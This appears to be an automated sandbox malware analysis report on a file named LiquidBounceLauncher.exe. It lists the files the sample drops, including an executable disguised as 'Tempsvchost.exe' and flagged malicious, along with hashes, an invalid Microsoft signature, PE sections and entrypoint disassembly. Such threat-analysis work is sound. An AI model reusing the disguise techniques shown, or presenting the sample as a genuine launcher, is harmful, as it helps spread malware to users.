                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Mon May 23 16:55:19 2022, 0x1205a4 type
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):29940
                                                                                                                                                                                    Entropy (8bit):2.4452542182403643
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:/98pvk2CK+O5SkxpCKvUZ7kxEVxYX2sQpF3C9u8KDhzDP:KkzW5LxIK8RkxIoaFh
                                                                                                                                                                                    MD5:F3F7DAFE6B5195948C74C2EA921348FB
                                                                                                                                                                                    SHA1:08654AA342DE11BE7378888B7617C3727539BBF7
                                                                                                                                                                                    SHA-256:911E66F03F6083996D6B7A657A7588687771EB8DA3F969BA0B766D9B41577734
                                                                                                                                                                                    SHA-512:654FA8700B2B3200F0EAAE72A4501C5CD59974D64601F1BBC6ACA9F593766AD26DA4089BBA0CBC7015CCD8459A6748E6CC917E6F47D469382ECE21EF6AB2D1AC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:MDMP....... .......w..b............4...........x...<.......T...L$..........T.......8...........T...............D[...........................................................................................U...........B......8.......GenuineIntelW...........T...........[..b.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER711B.tmp.WERInternalMetadata.xml

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8332
                                                                                                                                                                                    Entropy (8bit):3.695956347224513
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNiBS6Q6Y4HSUJVugmfhIS5+prY89b3i+sfY9m:RrlsNiE6Q6YoSUJVugmfhISY3i9f/
                                                                                                                                                                                    MD5:33EB0321A1EC149018422B01C64EE930
                                                                                                                                                                                    SHA1:618972A0BDC95F782F6BC7B1C5F6F1B998EAEE59
                                                                                                                                                                                    SHA-256:5ED47AFE9DB9BB02FEBEADAED10FEB3B3A306B742C9692A514056B00A2F6DBBD
                                                                                                                                                                                    SHA-512:00A9E3A14242550AEF617FF3CD513D3CB8FD9C834122F921DB8A51C04E9F19F59ED44115F73EA2A05DE03907DD458F61815FB508B707098503080092BACE6895
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.6.8.<./.P.i.d.>.......

                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER71C2.tmp.WERInternalMetadata.xml

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6284
                                                                                                                                                                                    Entropy (8bit):3.7160474572226474
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNiXQT65Y3oIS5+pr189bx6sfhJMbm:RrlsNiXs65Y3oISPxZfhJd
                                                                                                                                                                                    MD5:DFFBDB8DBDFEA5CF74F991475D0E779A
                                                                                                                                                                                    SHA1:3E8C1C8675C76A413FBF381EF8715E2C6F30CC30
                                                                                                                                                                                    SHA-256:6DB2C5690A8A4D70D519FD83606807EC0FBBB434C7B0548D35DAFA68F746BC4A
                                                                                                                                                                                    SHA-512:58A3027080A7960DBB3069367A88989636991BD63F13D874D23B607BDB12E9B24A8F0C932BEEECF8B19717AEC8DF9DC4635EC0229DE2D2AC2AF3F4D31752190C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.8.8.<./.P.i.d.>.......

                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7245.tmp.xml

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4618
                                                                                                                                                                                    Entropy (8bit):4.475171948242634
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:cvIwSD8zsEJgtWI98CWgc8sqYje8fm8M4J69F4+q8MMhNKX9d:uITfCnDgrsqYXJrqNw9d
                                                                                                                                                                                    MD5:4C5854A8472C262BDC31CED1D37DA9CE
                                                                                                                                                                                    SHA1:3CF428B83191E6880EDEAD7D1DC9472A5F2E6A93
                                                                                                                                                                                    SHA-256:3C7B8F51B47E69364471F62442F38BA61A08A5733065FD8A775610D3B5A0F90B
                                                                                                                                                                                    SHA-512:00A359307C19CA79CE150622F576406DD703CA4EBE22F23140DEC221843303D8DCE697BFEBB5A29D53576021F9F325AE72B37C5962D484A9677AD527D58CB140
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1527964" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER731B.tmp.xml

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4573
                                                                                                                                                                                    Entropy (8bit):4.448266830283935
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:cvIwSD8zsrJgtWI98CWgc8sqYjzs8fm8M4Jf9F1+q8rD06hJKJ1d:uITfFnDgrsqYXRJlW0mE1d
                                                                                                                                                                                    MD5:616F0E43E15999C1F60D6CC7C046715A
                                                                                                                                                                                    SHA1:8ACC5EF777BB91D986DD200ABE5D7CE20FD0A112
                                                                                                                                                                                    SHA-256:7E6DA98BE64BE1B50056CACBB24ECC37462C14214FB0BC1B5A5AB3348B14C2EC
                                                                                                                                                                                    SHA-512:7E942C99577E536B798A4089519AB075A5808D808206E03F59D9DB5DEFF29C4899AA056A693A9F5894F781528638A5286B58E951B7C62C12850D13D148D1D609
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1527965" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2932
                                                                                                                                                                                    Entropy (8bit):5.334469918014252
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHK7HKhBHKdHKB1AHKzvQTHmtHoxHImHK1HjHK/:iqXeqm00YqhQnouOq7qLqdqUqzcGtIxr
                                                                                                                                                                                    MD5:22BD1D3E275923717942240A5F4E893E
                                                                                                                                                                                    SHA1:04B2000EFBBB649A9F104B9AFF82D3F102F6EE6A
                                                                                                                                                                                    SHA-256:18B05376D0ABD17FCC775304B2B53BCA2CE34EE8292F69537462C350A8003844
                                                                                                                                                                                    SHA-512:CFBE175686499B1BA5A9863BE8B11B42C34726E7CBA201678A9717D815649A78A030AA54D5E533FA839F36BEBFFA24CBBF73EC2A0CE81BFA6C896135EA462277
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                                                                                                                                                    C:\Users\user\AppData\Local\Tempsvchost.exe

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1878984
                                                                                                                                                                                    Entropy (8bit):7.244626499704022
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:49152:3iLec3Lj+HX6IkSeTs1mII3y2RauO8Ze2hua8jGcCJpp+:3iLec3Lj+HX6IkSeTXII5RauVZziCcCI
                                                                                                                                                                                    MD5:6B59710C6032C24A28D5E09424978125
                                                                                                                                                                                    SHA1:68362D64A2C870E330CA39A688FE6934B60C1636
                                                                                                                                                                                    SHA-256:E87619FE6F34253E68A7E21E5AD97D11218F4C493CFF19E9ABAEA12E959CB808
                                                                                                                                                                                    SHA-512:0F4FA7C31604FCDF0D4E10084D73A9A82F4EBEDD6E45882E5DE1BCD8B8907E7E0376DD8FD13C3A10C155761835B6F0CFD27A2C40BD8AC35BA08DA970D6B75931
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 35%, Browse
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...uL.b..........................................@........................................... ..........................................................'..........................................................0................................text...l...........................`.P`.data...h...........................@.`..rdata.......P.......:..............@.`@.eh_fram,...........................@.0@.bss....`.............................`..idata...............t..............@.0..CRT................................@.0..tls.... ...........................@.0.................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    Static File Info

                                                                                                                                                                                    General

                                                                                                                                                                                    File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                    Entropy (8bit):6.443856477088752
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                    • VXD Driver (31/22) 0.00%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:LiquidBounceLauncher.exe
                                                                                                                                                                                    File size:1156040
                                                                                                                                                                                    MD5:8aaeb1206b0ba5bc0d7697148509a3be
                                                                                                                                                                                    SHA1:901683aa4bdef5527b69484de7a91a30e91348f0
                                                                                                                                                                                    SHA256:61993e08ea08b735c8966bea3c2cab4dbd2c62ccd1ad88ec42c59e1a9a8f8c71
                                                                                                                                                                                    SHA512:72c11bcb494a76c4a31c900f41732dc0d4cbbc4d88d0aa1b6511c7048e5419b2676f81d46de7b3fd042d01c2baf9e0dc7b29416c1c97b5ca8a2175a0be5dfc6a
                                                                                                                                                                                    SSDEEP:24576:aQ9935QeTsHVAYXv/PbhTvniqJDJN/ctvSnGpr18/V:aQ9935QeTsHVAYXvNL/Qr189
                                                                                                                                                                                    TLSH:F8355C2DEB4616F4D6535672868EEB7787047B388022EE7FFF8ADE18A4330573815252
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t.b.................X...x...............p....@.................................O......... ............................

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:00828e8e8686b000

                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Entrypoint:0x4012e0
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    Subsystem:windows cui
                                                                                                                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                                    Time Stamp:0x628B74FD [Mon May 23 11:50:21 2022 UTC]
                                                                                                                                                                                    TLS Callbacks:0x41ff30, 0x41fee0
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                    Import Hash:d0dfe559e003c7370c899d20dea7dea8

                                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                    Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                    • 9/2/2021 8:32:59 PM 9/1/2022 8:32:59 PM
                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                    • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                    Version:3
                                                                                                                                                                                    Thumbprint MD5:D15B2B9631F8B37BA8D83A5AE528A8BB
                                                                                                                                                                                    Thumbprint SHA-1:8740DF4ACB749640AD318E4BE842F72EC651AD80
                                                                                                                                                                                    Thumbprint SHA-256:2EB421FBB33BBF9C8F6B58C754B0405F40E02CB6328936AAE39DB7A24880EA21
                                                                                                                                                                                    Serial:33000002528B33AAF895F339DB000000000252

                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                    Instruction
                                                                                                                                                                                    sub esp, 1Ch
                                                                                                                                                                                    mov dword ptr [esp], 00000001h
                                                                                                                                                                                    call dword ptr [0051A2F0h]
                                                                                                                                                                                    call 00007F2C44B98800h
                                                                                                                                                                                    lea esi, dword ptr [esi+00h]
                                                                                                                                                                                    lea edi, dword ptr [edi+00000000h]
                                                                                                                                                                                    sub esp, 1Ch
                                                                                                                                                                                    mov dword ptr [esp], 00000002h
                                                                                                                                                                                    call dword ptr [0051A2F0h]
                                                                                                                                                                                    call 00007F2C44B987E0h
                                                                                                                                                                                    lea esi, dword ptr [esi+00h]
                                                                                                                                                                                    lea edi, dword ptr [edi+00000000h]
                                                                                                                                                                                    jmp dword ptr [0051A328h]
                                                                                                                                                                                    lea esi, dword ptr [esi+00h]
                                                                                                                                                                                    lea edi, dword ptr [edi+00000000h]
                                                                                                                                                                                    jmp dword ptr [0051A318h]
                                                                                                                                                                                    nop
                                                                                                                                                                                    nop
                                                                                                                                                                                    nop
                                                                                                                                                                                    nop
                                                                                                                                                                                    nop
                                                                                                                                                                                    nop
                                                                                                                                                                                    nop
                                                                                                                                                                                    nop
                                                                                                                                                                                    nop
                                                                                                                                                                                    nop
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                    push esi
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    sub esp, 10h
                                                                                                                                                                                    mov dword ptr [esp], 004D5000h
                                                                                                                                                                                    call 00007F2C44BC6C49h
                                                                                                                                                                                    sub esp, 04h
                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                    je 00007F2C44B989F7h
                                                                                                                                                                                    mov dword ptr [esp], 004D5000h
                                                                                                                                                                                    mov ebx, eax
                                                                                                                                                                                    call 00007F2C44BC6BF0h
                                                                                                                                                                                    sub esp, 04h
                                                                                                                                                                                    mov dword ptr [00519A54h], eax
                                                                                                                                                                                    mov dword ptr [esp+04h], 004D5013h
                                                                                                                                                                                    mov dword ptr [esp], ebx
                                                                                                                                                                                    call 00007F2C44BC6C10h
                                                                                                                                                                                    sub esp, 08h
                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                    mov dword ptr [esp+04h], 004D5029h
                                                                                                                                                                                    mov dword ptr [esp], ebx
                                                                                                                                                                                    call 00007F2C44BC6BFBh
                                                                                                                                                                                    sub esp, 08h
                                                                                                                                                                                    mov dword ptr [004B7000h], eax
                                                                                                                                                                                    test esi, esi
                                                                                                                                                                                    je 00007F2C44B98953h
                                                                                                                                                                                    mov dword ptr [eax+eax+00h], 00000000h

                                                                                                                                                                                    Data Directories

                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x11a0000xb98.idata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x117c000x27c8
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x11c0040x18.tls
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x11a2300x1cc.idata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                    Sections

                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    .text0x10000xb56bc0xb5800False0.380206988206data6.26194946866IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .data0xb70000x1d4480x1d600False0.741680518617data7.16788770015IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .rdata0xd50000xadbc0xae00False0.30825700431data5.62809090954IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .eh_fram0xe00000x38a2c0x38c00False0.180255368943data4.77052522826IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .bss0x1190000xb600x0False0empty0.0IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .idata0x11a0000xb980xc00False0.406575520833data5.10710618954IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .CRT0x11b0000x180x200False0.046875data0.118369631259IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
